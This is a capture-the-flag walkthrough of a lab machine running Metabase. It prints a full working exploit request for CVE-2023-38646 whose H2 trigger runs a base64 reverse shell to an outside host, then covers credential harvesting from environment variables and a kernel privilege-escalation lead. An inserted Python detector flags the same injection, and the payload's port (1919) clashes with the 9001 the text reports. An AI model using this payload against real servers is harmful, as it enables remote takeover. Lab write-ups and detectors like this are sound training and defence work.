This is an Ubuntu 22.04 host running an HTTP server on port 80. The vulnerable web application is Metabase; with the appropriate exploit, RCE can be gained. For escalation, a kernel vulnerability is abused.
Browsing the hidden subdomain at http://data.analytical.htb we find a login portal for a Metabase service.
Searching for Metabase vulnerabilities we find a vulnerability (https://www.cvedetails.com/cve/CVE-2023-38646) in the /api/setup/validate endpoint that can lead to RCE.
USER
Searching GitHub for a PoC turns up https://github.com/securezeron/CVE-2023-38646. Analyzing it, we see the first step is to obtain the setup token; for this, just query the /api/session/properties endpoint and read the setup-token field. Then, to obtain RCE, we query the /api/setup/validate endpoint with the setup token and the appropriate payload.
We can do this ourselves with Burp Suite.
So the setup token is "setup-token" : "249fa03d-fd94-4d5b-b94f-b4ebf3df681f". For the payload, just use a base64-encoded sh -i reverse shell and query the endpoint by building a POST request in Burp Suite.
POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type: application/json
Content-Length: 818

{
  "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
  "details": {
    "is_on_demand": false,
    "is_full_sync": false,
    "is_sample": false,
    "cache_ttl": null,
    "refingerprint": false,
    "auto_run_queries": true,
    "schedules": {},
    "details": {
      "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjEvMTkxOSAwPiYxCg==}|{base64,-d}|{bash,-i}')\n$$--=x",
      "advanced-options": false,
      "ssl": true
    },
    "name": "an-sec-research-team",
    "engine": "h2"
  }
}
If this does not work, just use the PoC, which has the shell hardcoded in base64 within its source code.
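From the defender's side, the two requests described above are easy to recognise: an anonymous read of /api/session/properties that still returns a setup-token, followed by a POST to /api/setup/validate whose H2 "db" value carries a trailing CREATE TRIGGER / $$//javascript block. The following Python is an added example, not part of the original writeup or of the PoC repository: it checks a properties response for token exposure and scans a constructed JSON-per-line request log (fields src, method, path, body are assumptions of this example) for setup requests carrying those injection markers.

```python
import json
from typing import Dict, List

# Strings that appear in the H2 connection-string injection used against
# /api/setup/validate in CVE-2023-38646: a ";CREATE TRIGGER ... $$//javascript"
# block appended to the "db" value so H2 evaluates attacker-supplied JavaScript.
INJECTION_MARKERS = (
    "CREATE TRIGGER",
    "$$//javascript",
    "java.lang.Runtime",
    "TRACE_LEVEL_SYSTEM_OUT",
)


def setup_token_exposed(properties_json: str) -> bool:
    """Return True if an anonymous /api/session/properties response still carries
    a non-empty "setup-token". A fully configured, patched Metabase should not hand
    that value to unauthenticated callers; if it does, the setup endpoint is usable."""
    try:
        props = json.loads(properties_json)
    except json.JSONDecodeError:
        return False
    return bool(props.get("setup-token"))


def inspect_setup_validate(body: str) -> List[str]:
    """Return the suspicious markers found in one POST /api/setup/validate body."""
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        # A non-JSON body is itself unusual for this endpoint.
        return ["non-json-body"]
    details = req.get("details", {})
    inner = details.get("details", {}) if isinstance(details, dict) else {}
    db = str(inner.get("db", ""))
    hits = [m for m in INJECTION_MARKERS if m in db]
    # A legitimate setup never points the H2 engine at the sample DB bundled in metabase.jar.
    if isinstance(details, dict) and details.get("engine") == "h2" and db.startswith("zip:/app/metabase.jar"):
        hits.append("h2-bundled-jar-db")
    return hits


def scan_request_log(log_lines: List[str]) -> List[Dict[str, object]]:
    """Scan JSON-per-line request records (constructed format: src, method, path, body)
    and return one finding per suspicious /api/setup/validate request."""
    findings: List[Dict[str, object]] = []
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("method") != "POST" or rec.get("path") != "/api/setup/validate":
            continue
        hits = inspect_setup_validate(rec.get("body", ""))
        if hits:
            findings.append({"src": rec.get("src"), "markers": hits})
    return findings


# Constructed sample data (not captured from the machine): an exposed-token response,
# a benign setup request and one carrying an injected H2 connection string.
SAMPLE_PROPERTIES = '{"setup-token": "00000000-0000-0000-0000-000000000000", "public-settings": {}}'

BENIGN_BODY = json.dumps({
    "token": "00000000-0000-0000-0000-000000000000",
    "details": {"engine": "postgres",
                "details": {"host": "db.internal", "port": 5432, "dbname": "metabase"}},
})
INJECTED_BODY = json.dumps({
    "token": "00000000-0000-0000-0000-000000000000",
    "details": {"engine": "h2",
                "details": {"db": "zip:/app/metabase.jar!/sample-database.db;"
                                  "MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;"
                                  "CREATE TRIGGER x BEFORE SELECT ON INFORMATION_SCHEMA.TABLES "
                                  "AS $$//javascript\njava.lang.Runtime.getRuntime().exec('id')\n$$--=x"}},
})
SAMPLE_LOG = [
    json.dumps({"src": "10.0.0.5", "method": "GET", "path": "/api/session/properties", "body": ""}),
    json.dumps({"src": "10.0.0.9", "method": "POST", "path": "/api/setup/validate", "body": BENIGN_BODY}),
    json.dumps({"src": "10.0.0.5", "method": "POST", "path": "/api/setup/validate", "body": INJECTED_BODY}),
]

if __name__ == "__main__":
    print("setup-token exposed:", setup_token_exposed(SAMPLE_PROPERTIES))
    for finding in scan_request_log(SAMPLE_LOG):
        print(f"{finding['src']}: {', '.join(finding['markers'])}")
```

The token check is the quickest way to confirm whether an instance is still exposed after patching: a patched Metabase stops returning setup-token to anonymous callers, so the second step never gets a usable token. The log scan keys on the connection-string shape rather than on any particular command, so it still fires when the base64 payload changes.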
After issuing the exploit, a sh shell is received on port 9001. Enumerate the system.
> uname -a && cat /etc/os-release
Linux befd7ac0fb41 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 Linux
NAME="Alpine Linux"
ID=alpine
VERSION_ID=3.18.2
PRETTY_NAME="Alpine Linux v3.18"
> whoami && id
metabase
uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
The kernel string is Ubuntu's but /etc/os-release reports Alpine, so we are in some kind of limited system, most likely a container. Looking around we find a script, /app/run_metabase.sh, that starts the database and manipulates some environment variables, so let's enumerate with env.
Clear-text credentials are found here, so we can just log in using them.
> ssh metalytics@$target
metalytics@10.129.136.15's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64)
Last login: Sat Oct 7 23:19:29 2023 from 10.10.14.80
metalytics@analytics:~$
This is a low-privilege shell, enough to retrieve the user flag.
SYSTEM
Now that we have a full shell outside the container, enumerate the system again.
> uname -a && cat /proc/version
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Linux version 6.2.0-25-generic (buildd@lcy02-amd64-044) (x86_64-linux-gnu-gcc-11 (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2
Notice the system is Ubuntu 22.04 and the kernel is 6.2.0. This release is vulnerable to the GameOver(lay) Ubuntu privilege escalation (CVE-2023-2640 and CVE-2023-32629).